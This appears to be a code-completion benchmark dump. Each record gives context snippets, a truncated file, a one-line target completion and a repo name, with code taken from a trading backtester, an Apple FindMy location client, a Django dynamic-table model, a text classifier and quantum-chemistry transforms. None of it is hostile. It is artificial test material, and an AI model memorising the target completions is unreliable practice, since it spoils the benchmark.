"snippet": "class FillEvent(Event):\n \"\"\"\n Fill event once an order based on the response from the broker\n\n Parameters:\n datetime - A datetime at which the signal is created.\n symbol - The symbol for current asset.\n exchange - The exchange, broker where the order is filled\n quantity - quantity filled\n direction\n fill_cost - can contain commission already\n commission - Defaulted to None if non specified\n \"\"\"\n\n def __init__(\n self,\n datetime,\n symbol,\n exchange,\n quantity,\n direction,\n fill_cost,\n commission=None,\n ):\n self.type = \"FILL\"\n self.datetime = datetime\n self.symbol = symbol\n self.exchange = exchange\n self.quantity = quantity\n self.direction = direction\n self.fill_cost = fill_cost\n\n # Calculate commission\n if commission is None:\n self.commission = self._calculate_commission()\n else:\n self.commission = commission\n\n def _calculate_commission(self):\n \"\"\"\n TODO: Commission fees to be implemented\n \"\"\"\n # between 1 and 2%\n return max(1.5, 0.015 * self.quantity)"
},
{
"identifier": "OrderEvent",
"path": "backtester/events.py",
"snippet": "class OrderEvent(Event):\n \"\"\"\n Order event to be sent to a broker api. It takes into account the quantity,\n type of ordering, and direction (long, short, exit...)\n\n Parameters:\n symbol - The symbol for current asset.\n order_type - Whether is it a 'MARKET' or 'LIMIT' order\n quantity --> TODO: this should be implemented in a risk class\n (Kelly Criterion, etc)\n direction - 1 or -1 based on the type\n \"\"\"\n\n def __init__(self, symbol, order_type, quantity, direction):\n self.type = \"ORDER\"\n self.symbol = symbol\n self.order_type = order_type\n self.quantity = quantity\n self.direction = direction\n\n def print_order(self):\n \"\"\"\n Outputs the values within the Order.\n \"\"\"\n print(\"Order: Symbol=%s, Type=%s, Quantity=%s, Direction=%s\") % (\n self.symbol,\n self.order_type,\n self.quantity,\n self.direction,\n )"
}
] | from abc import abstractmethod
from datetime import datetime
from .events import FillEvent, OrderEvent | 653 |
class ExecutionHandler:
def register(self, events):
self.events = events
@abstractmethod
def execute_order(self, event):
raise NotImplementedError("Should implement execute_order()")
class SimulatedExecutionHandler(ExecutionHandler):
def __init__(self):
pass
def execute_order(self, event):
|
class ExecutionHandler:
def register(self, events):
self.events = events
@abstractmethod
def execute_order(self, event):
raise NotImplementedError("Should implement execute_order()")
class SimulatedExecutionHandler(ExecutionHandler):
def __init__(self):
pass
def execute_order(self, event): | if isinstance(event, OrderEvent): | 1 | 2023-12-16 21:09:00+00:00 | 2k |
liebrandapps/FindMyGUI | findmy/request_reports.py | [
{
"identifier": "icloud_login_mobileme",
"path": "findmy/pypush_gsa_icloud.py",
"snippet": "def icloud_login_mobileme(ctx, second_factor='sms'):\n username = ctx.cfg.appleId_appleId\n password = ctx.cfg.appleId_password\n anisetteUrl = ctx.cfg.general_anisetteHost + \":\" + str(ctx.cfg.general_anisettePort)\n if not username or not password:\n now = datetime.now()\n ctx.signInDone = False\n ctx.requestCreds = int(now.timestamp())\n ctx.log.info(\"[ICLOUD] Waiting for password (90 seconds from now on)\")\n interval = 30\n while interval > 0:\n time.sleep(3.0)\n if len(ctx.userName) > 0 and len(ctx.password) > 0:\n username = ctx.userName\n password = ctx.password\n interval = 0\n continue\n if not username or not password:\n ctx.log.error(\"[ICLOUD] No User/Password received, stopping\")\n return None\n else:\n ctx.log.info(f\"[ICLOUD] Received User {username} / Password\")\n\n g = gsa_authenticate(username, password, ctx, second_factor=second_factor)\n pet = g[\"t\"][\"com.apple.gs.idms.pet\"][\"token\"]\n adsid = g[\"adsid\"]\n\n data = {\n \"apple-id\": username,\n \"delegates\": {\"com.apple.mobileme\": {}},\n \"password\": pet,\n \"client-id\": str(USER_ID),\n }\n data = plist.dumps(data)\n\n headers = {\n \"X-Apple-ADSID\": adsid,\n \"User-Agent\": \"com.apple.iCloudHelper/282 CFNetwork/1408.0.4 Darwin/22.5.0\",\n \"X-Mme-Client-Info\": '<MacBookPro18,3> <Mac OS X;13.4.1;22F8> <com.apple.AOSKit/282 (com.apple.accountsd/113)>'\n }\n headers.update(generate_anisette_headers(anisetteUrl))\n\n r = requests.post(\n \"https://setup.icloud.com/setup/iosbuddy/loginDelegates\",\n auth=(username, pet),\n data=data,\n headers=headers,\n verify=False,\n )\n\n return plist.loads(r.content)"
},
{
"identifier": "generate_anisette_headers",
"path": "findmy/pypush_gsa_icloud.py",
"snippet": "def generate_anisette_headers(anisetteUrl):\n try:\n import pyprovision\n from ctypes import c_ulonglong\n import secrets\n adi = pyprovision.ADI(\"./anisette/\")\n adi.provisioning_path = \"./anisette/\"\n device = pyprovision.Device(\"./anisette/device.json\")\n if not device.initialized:\n # Pretend to be a MacBook Pro\n device.server_friendly_description = \"<MacBookPro13,2> <macOS;13.1;22C65> <com.apple.AuthKit/1 (com.apple.dt.Xcode/3594.4.19)>\"\n device.unique_device_identifier = str(uuid.uuid4()).upper()\n device.adi_identifier = secrets.token_hex(8).lower()\n device.local_user_uuid = secrets.token_hex(32).upper()\n adi.identifier = device.adi_identifier\n dsid = c_ulonglong(-2).value\n is_prov = adi.is_machine_provisioned(dsid)\n if not is_prov:\n print(\"provisioning...\")\n provisioning_session = pyprovision.ProvisioningSession(adi, device)\n provisioning_session.provision(dsid)\n otp = adi.request_otp(dsid)\n a = {\"X-Apple-I-MD\": base64.b64encode(bytes(otp.one_time_password)).decode(),\n \"X-Apple-I-MD-M\": base64.b64encode(bytes(otp.machine_identifier)).decode()}\n except ImportError:\n print(f'pyprovision is not installed, querying {anisetteUrl} for an anisette server')\n h = json.loads(requests.get(anisetteUrl, timeout=5).text)\n a = {\"X-Apple-I-MD\": h[\"X-Apple-I-MD\"], \"X-Apple-I-MD-M\": h[\"X-Apple-I-MD-M\"]}\n a.update(generate_meta_headers(user_id=USER_ID, device_id=DEVICE_ID))\n return a"
}
] | import base64
import datetime
import hashlib
import json
import os
import struct
import requests
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from findmy.pypush_gsa_icloud import icloud_login_mobileme, generate_anisette_headers | 1,373 |
class FindMy:
def __init__(self, ctx):
self.ctx = ctx
def sha256(self, data):
digest = hashlib.new("sha256")
digest.update(data)
return digest.digest()
def decrypt(self, enc_data, algorithm_dkey, mode):
decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
return decryptor.update(enc_data) + decryptor.finalize()
def decode_tag(self, data):
latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
confidence = int.from_bytes(data[8:9], 'big')
status = int.from_bytes(data[9:10], 'big')
return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}
def getAuth(self, regenerate=False, second_factor='sms'):
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
if os.path.exists(CONFIG_PATH) and not regenerate:
with open(CONFIG_PATH, "r") as f:
j = json.load(f)
else:
mobileme = None
try:
|
class FindMy:
def __init__(self, ctx):
self.ctx = ctx
def sha256(self, data):
digest = hashlib.new("sha256")
digest.update(data)
return digest.digest()
def decrypt(self, enc_data, algorithm_dkey, mode):
decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
return decryptor.update(enc_data) + decryptor.finalize()
def decode_tag(self, data):
latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
confidence = int.from_bytes(data[8:9], 'big')
status = int.from_bytes(data[9:10], 'big')
return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}
def getAuth(self, regenerate=False, second_factor='sms'):
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
if os.path.exists(CONFIG_PATH) and not regenerate:
with open(CONFIG_PATH, "r") as f:
j = json.load(f)
else:
mobileme = None
try: | mobileme = icloud_login_mobileme(self.ctx, second_factor=second_factor) | 0 | 2023-12-16 12:39:52+00:00 | 2k |
Samuel-Effiong/Django-Dynamic-Table | django_dynamic_table/models.py | [
{
"identifier": "TableHaveNoRow",
"path": "django_dynamic_table/errors.py",
"snippet": "class TableHaveNoRow(DynamicTableError):\r\n pass\r"
},
{
"identifier": "TableHaveNoColumn",
"path": "django_dynamic_table/errors.py",
"snippet": "class TableHaveNoColumn(DynamicTableError):\r\n pass\r"
},
{
"identifier": "ColumnNotInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class ColumnNotInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "RowNotInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class RowNotInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "DuplicateColumnInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class DuplicateColumnInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "DynamicTableError",
"path": "django_dynamic_table/errors.py",
"snippet": "class DynamicTableError(Exception):\r\n pass\r"
},
{
"identifier": "UnSupportedDataType",
"path": "django_dynamic_table/errors.py",
"snippet": "class UnSupportedDataType(TableColumnError):\r\n pass\r"
},
{
"identifier": "CantParseValueToDataType",
"path": "django_dynamic_table/errors.py",
"snippet": "class CantParseValueToDataType(CellValueError):\r\n pass\r"
},
{
"identifier": "CellDoesNotExist",
"path": "django_dynamic_table/errors.py",
"snippet": "class CellDoesNotExist(CellValueError):\r\n pass"
}
] | from typing import Sequence
from datetime import datetime
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from .errors import (
TableHaveNoRow, TableHaveNoColumn, ColumnNotInTable,
RowNotInTable, DuplicateColumnInTable, DynamicTableError,
UnSupportedDataType, CantParseValueToDataType, CellDoesNotExist
)
| 934 | """
Creating a Dynamic Table using conventional Django standard
This Table gives you more control over it manipulation than Django models
Developed by: Samuel Effiong Nkopuruk
Email: [email protected]
"""
__SUPPORTED_DATA_TYPE_CHOICES__ = (
('char', 'Char'),
('int', 'Int'),
('float', 'Float'),
('bool', 'Bool'),
('textfield', 'TextField'),
('date', 'Date'),
)
# Create your models here.
class DynamicTable(models.Model):
table_name = models.CharField(_('Table Name'), max_length=255, unique=True)
table_description = models.TextField(_('Table Description'), blank=True)
date_created = models.DateTimeField(_('Date Created'), default=timezone.now)
table_columns = models.ManyToManyField('TableColumn', blank=True)
table_rows = models.ManyToManyField('TableRow', blank=True)
class Meta:
ordering = ('-date_created', )
def __str__(self) -> str:
return f"{self.table_name}"
def __total_table_rows(self) -> int:
field = self.table_columns.first()
if field and isinstance(field, TableColumn):
return self.table_columns.all().count()
else:
# the table is empty
return 0
def __total_table_columns(self) -> int:
return self.table_columns.all().count()
def table_info(self) -> dict[str, int]:
description = {
'rows': self.__total_table_rows(),
'columns': self.__total_table_columns()
}
return description
def is_empty(self) -> bool:
table_info = self.table_info()
rows = table_info['rows']
columns = table_info['columns']
return True if columns == 0 or rows == 0 else False
def is_column(self, column_name: str) -> bool:
if not isinstance(column_name, str):
raise ValueError("column name must be a str")
try:
column = self.table_columns.get(column_name=column_name)
return True
except TableColumn.DoesNotExist:
return False
def get_supported_data_types(self) -> list[str]:
return [data_type[0] for data_type in __SUPPORTED_DATA_TYPE_CHOICES__]
def data_type_is_supported(self, data_type: str | list) -> bool | list[bool]:
supported_data_types = self.get_supported_data_types()
if isinstance(data_type, str):
return data_type.lower().strip() in supported_data_types
elif isinstance(data_type, (list, tuple, set)):
return [_type.lower().strip() in supported_data_types for _type in data_type]
else:
raise ValueError('arg must be either a str or a sequence')
def add_column(self, column_name: str, data_type: str):
if isinstance(column_name, str) and isinstance(data_type, str):
if not self.data_type_is_supported(data_type):
raise UnSupportedDataType()
if self.is_column(column_name):
| """
Creating a Dynamic Table using conventional Django standard
This Table gives you more control over it manipulation than Django models
Developed by: Samuel Effiong Nkopuruk
Email: [email protected]
"""
__SUPPORTED_DATA_TYPE_CHOICES__ = (
('char', 'Char'),
('int', 'Int'),
('float', 'Float'),
('bool', 'Bool'),
('textfield', 'TextField'),
('date', 'Date'),
)
# Create your models here.
class DynamicTable(models.Model):
table_name = models.CharField(_('Table Name'), max_length=255, unique=True)
table_description = models.TextField(_('Table Description'), blank=True)
date_created = models.DateTimeField(_('Date Created'), default=timezone.now)
table_columns = models.ManyToManyField('TableColumn', blank=True)
table_rows = models.ManyToManyField('TableRow', blank=True)
class Meta:
ordering = ('-date_created', )
def __str__(self) -> str:
return f"{self.table_name}"
def __total_table_rows(self) -> int:
field = self.table_columns.first()
if field and isinstance(field, TableColumn):
return self.table_columns.all().count()
else:
# the table is empty
return 0
def __total_table_columns(self) -> int:
return self.table_columns.all().count()
def table_info(self) -> dict[str, int]:
description = {
'rows': self.__total_table_rows(),
'columns': self.__total_table_columns()
}
return description
def is_empty(self) -> bool:
table_info = self.table_info()
rows = table_info['rows']
columns = table_info['columns']
return True if columns == 0 or rows == 0 else False
def is_column(self, column_name: str) -> bool:
if not isinstance(column_name, str):
raise ValueError("column name must be a str")
try:
column = self.table_columns.get(column_name=column_name)
return True
except TableColumn.DoesNotExist:
return False
def get_supported_data_types(self) -> list[str]:
return [data_type[0] for data_type in __SUPPORTED_DATA_TYPE_CHOICES__]
def data_type_is_supported(self, data_type: str | list) -> bool | list[bool]:
supported_data_types = self.get_supported_data_types()
if isinstance(data_type, str):
return data_type.lower().strip() in supported_data_types
elif isinstance(data_type, (list, tuple, set)):
return [_type.lower().strip() in supported_data_types for _type in data_type]
else:
raise ValueError('arg must be either a str or a sequence')
def add_column(self, column_name: str, data_type: str):
if isinstance(column_name, str) and isinstance(data_type, str):
if not self.data_type_is_supported(data_type):
raise UnSupportedDataType()
if self.is_column(column_name):
| raise DuplicateColumnInTable()
| 4 | 2023-12-19 15:50:38+00:00 | 2k |
gsamil/text-classification | recommender/train.py | [
{
"identifier": "vocab",
"path": "data.py",
"snippet": "class ClassificationSample(BaseModel):\ndef preprocess_text(text: str) -> str:\ndef get_samples_from_file(file_path: str) -> list[ClassificationSample]:\ndef stratify_samples(\n samples: list[ClassificationSample], number_per_sample: int\n) -> list[ClassificationSample]:\ndef save_categories(train_file: str) -> None:\ndef load_categories() -> Tuple[list[str], dict[str, int]]:\ndef set_feature_dimension(lst: list[int], target_length: int):\ndef print_text_lengths(train_file: str) -> None:"
},
{
"identifier": "TextClassifier",
"path": "model.py",
"snippet": "class HyperParameters(BaseModel):\nclass TrainingParameters(BaseModel):\nclass TextClassifier(nn.Module):\n def to_dict(self) -> dict[Any, Any]:\n def load_from_json(cls, file_path: str) -> \"HyperParameters\":\n def print(self):\n def to_dict(self) -> dict[Any, Any]:\n def load_from_json(cls, file_path: str) -> \"TrainingParameters\":\n def print(self):\n def __init__(self, hparameters: HyperParameters):\n def forward(self, x):\n def save_model(\n self, model_dir: str, training_parameters: TrainingParameters\n ) -> None:\n def load_from_dir(\n cls, model_dir: str, device: Union[str, torch.device]\n ) -> Tuple[\"TextClassifier\", TrainingParameters]:"
},
{
"identifier": "ClassificationDataset",
"path": "recommender/dataset.py",
"snippet": "class ClassificationDataset(Dataset):\n def __init__(\n self,\n samples: list[ClassificationSample],\n vocab: dict[str, int],\n categories: list[str],\n category_to_idx: dict[str, int],\n feature_size: int,\n sample_negatives: int | None,\n shuffle: bool,\n ):\n self.data: list[ClassificationSample] = samples\n self.vocab: dict[str, int] = vocab\n self.categories: list[str] = categories\n self.category_to_idx: dict[str, int] = category_to_idx\n self.feature_size: int = feature_size\n self.sample_negatives: int | None = sample_negatives\n self.shuffle: bool = shuffle\n\n def __len__(self) -> int:\n return len(self.data)\n\n def __getitem__(self, idx) -> Tuple[torch.LongTensor, list[int], int]:\n example = self.data[idx]\n combined_features_positive = []\n combined_features_negative = []\n for category in self.categories:\n # this is the part where we convert product text and category to indexes\n product_text_tokens = [self.vocab[token] for token in example.product_text]\n category_tokens = [self.vocab[token] for token in category]\n product_text_token_indexes = set_feature_dimension(\n product_text_tokens,\n self.feature_size - len(category_tokens),\n )\n token_indexes = product_text_token_indexes + category_tokens\n\n if example.category == category:\n combined_features_positive.append(token_indexes)\n else:\n combined_features_negative.append(token_indexes)\n\n if self.sample_negatives is not None:\n combined_features_negative = random.sample(\n combined_features_negative, self.sample_negatives\n )\n combined_features_with_labels = [\n (feature, 1) for feature in combined_features_positive\n ] + [(feature, 0) for feature in combined_features_negative]\n\n if self.shuffle:\n random.shuffle(combined_features_with_labels)\n return (\n torch.LongTensor([f for f, _ in combined_features_with_labels]),\n [l for _, l in combined_features_with_labels],\n [i for i, (_, l) in enumerate(combined_features_with_labels) if l == 1][0],\n )"
},
{
"identifier": "CATEGORIES_PATH",
"path": "settings.py",
"snippet": "CATEGORIES_PATH = \"./data/categories.csv\""
}
] | import torch
import time
import os
from torch import nn
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import ExponentialLR
from data import (
vocab,
get_samples_from_file,
stratify_samples,
save_categories,
load_categories,
)
from model import TextClassifier, TrainingParameters, device, HyperParameters
from recommender.dataset import ClassificationDataset
from settings import CATEGORIES_PATH | 1,057 |
# Set `train_file`, `test_file` and `model_dir` apropriately.
# Set `negative_samples` to the number of negative samples you want to use.
# run with `export PYTHONPATH=. && python recommender/train.py` in the main directory.
train_file = "./data/train_cleaned.csv"
test_file = "./data/test_cleaned.csv"
model_dir = "./recommender/saved_model"
if __name__ == "__main__":
hparams = HyperParameters(
|
# Set `train_file`, `test_file` and `model_dir` apropriately.
# Set `negative_samples` to the number of negative samples you want to use.
# run with `export PYTHONPATH=. && python recommender/train.py` in the main directory.
train_file = "./data/train_cleaned.csv"
test_file = "./data/test_cleaned.csv"
model_dir = "./recommender/saved_model"
if __name__ == "__main__":
hparams = HyperParameters( | vocab_size=len(vocab), | 0 | 2023-12-17 11:37:37+00:00 | 2k |
zhcui/polar_preview | polar/basis/trans_1e.py | [
{
"identifier": "mdot",
"path": "polar/utils/misc.py",
"snippet": "def mdot(*args):\n \"\"\"\n Reduced matrix dot.\n \"\"\"\n return reduce(np.dot, args)"
},
{
"identifier": "kdot",
"path": "polar/utils/misc.py",
"snippet": "def kdot(a, b):\n \"\"\"\n Matrix dot with kpoints.\n \"\"\"\n ka, s1_a, _ = a.shape\n kb, _, s2_b = b.shape\n assert ka == kb\n res = np.zeros((ka, s1_a, s2_b), dtype=np.result_type(a.dtype, b.dtype))\n for k in range(ka):\n np.dot(a[k], b[k], out=res[k])\n return res"
},
{
"identifier": "get_spin_dim",
"path": "polar/utils/misc.py",
"snippet": "def get_spin_dim(arrays, non_spin_dim=3):\n \"\"\"\n Get spin dimension for a list of arrays.\n \"\"\"\n spin = 1\n for a in arrays:\n a = np.asarray(a)\n if a.ndim == non_spin_dim:\n continue\n elif a.ndim == non_spin_dim + 1:\n spin = max(spin, a.shape[0])\n else:\n raise ValueError\n return spin"
},
{
"identifier": "add_spin_dim",
"path": "polar/utils/misc.py",
"snippet": "def add_spin_dim(H, spin, non_spin_dim=3):\n \"\"\"\n Add an additional dimension to array H.\n \"\"\"\n H = np.asarray(H)\n if H.ndim == non_spin_dim:\n H = H[None]\n assert H.ndim == (non_spin_dim + 1)\n if H.shape[0] < spin:\n H = np.asarray((H[0],) * spin)\n return H"
}
] | import numpy as np
import scipy.linalg as la
from polar.utils.misc import (mdot, kdot, get_spin_dim, add_spin_dim) | 798 | #!/usr/bin/env python
"""
Transform 1e quantities.
Authors:
Zhi-Hao Cui
Tianyu Zhu
Shunyue Yuan
"""
# *****************************************************************************
# Transform functions AO -> LO and LO -> AO
# for h1 and rdm1
# *****************************************************************************
def trans_h1_to_lo(h_ao_ao, C_ao_lo):
r"""
Transform h1 to lo basis, with kpts.
h^{LO} = C^{\dagger} h^{AO} C
"""
h_ao_ao = np.asarray(h_ao_ao)
C_ao_lo = np.asarray(C_ao_lo)
nkpts = C_ao_lo.shape[-3]
nlo = C_ao_lo.shape[-1]
res_type = np.result_type(h_ao_ao.dtype, C_ao_lo.dtype)
# treat the special case where h is 0 or [0, 0]
if h_ao_ao.ndim == 0: # scalar
return np.ones((nkpts, nlo, nlo), dtype=res_type) * h_ao_ao
elif h_ao_ao.ndim == 1: # [0, 0]
spin = len(h_ao_ao)
h_lo_lo = np.ones((spin, nkpts, nlo, nlo), dtype=res_type)
for s in range(spin):
h_lo_lo[s] *= h_ao_ao[s]
return h_lo_lo
if C_ao_lo.ndim == 3 and h_ao_ao.ndim == 3:
h_lo_lo = np.zeros((nkpts, nlo, nlo), dtype=res_type)
for k in range(nkpts):
| #!/usr/bin/env python
"""
Transform 1e quantities.
Authors:
Zhi-Hao Cui
Tianyu Zhu
Shunyue Yuan
"""
# *****************************************************************************
# Transform functions AO -> LO and LO -> AO
# for h1 and rdm1
# *****************************************************************************
def trans_h1_to_lo(h_ao_ao, C_ao_lo):
r"""
Transform h1 to lo basis, with kpts.
h^{LO} = C^{\dagger} h^{AO} C
"""
h_ao_ao = np.asarray(h_ao_ao)
C_ao_lo = np.asarray(C_ao_lo)
nkpts = C_ao_lo.shape[-3]
nlo = C_ao_lo.shape[-1]
res_type = np.result_type(h_ao_ao.dtype, C_ao_lo.dtype)
# treat the special case where h is 0 or [0, 0]
if h_ao_ao.ndim == 0: # scalar
return np.ones((nkpts, nlo, nlo), dtype=res_type) * h_ao_ao
elif h_ao_ao.ndim == 1: # [0, 0]
spin = len(h_ao_ao)
h_lo_lo = np.ones((spin, nkpts, nlo, nlo), dtype=res_type)
for s in range(spin):
h_lo_lo[s] *= h_ao_ao[s]
return h_lo_lo
if C_ao_lo.ndim == 3 and h_ao_ao.ndim == 3:
h_lo_lo = np.zeros((nkpts, nlo, nlo), dtype=res_type)
for k in range(nkpts): | h_lo_lo[k] = mdot(C_ao_lo[k].conj().T, h_ao_ao[k], C_ao_lo[k]) | 0 | 2023-12-18 07:39:51+00:00 | 2k |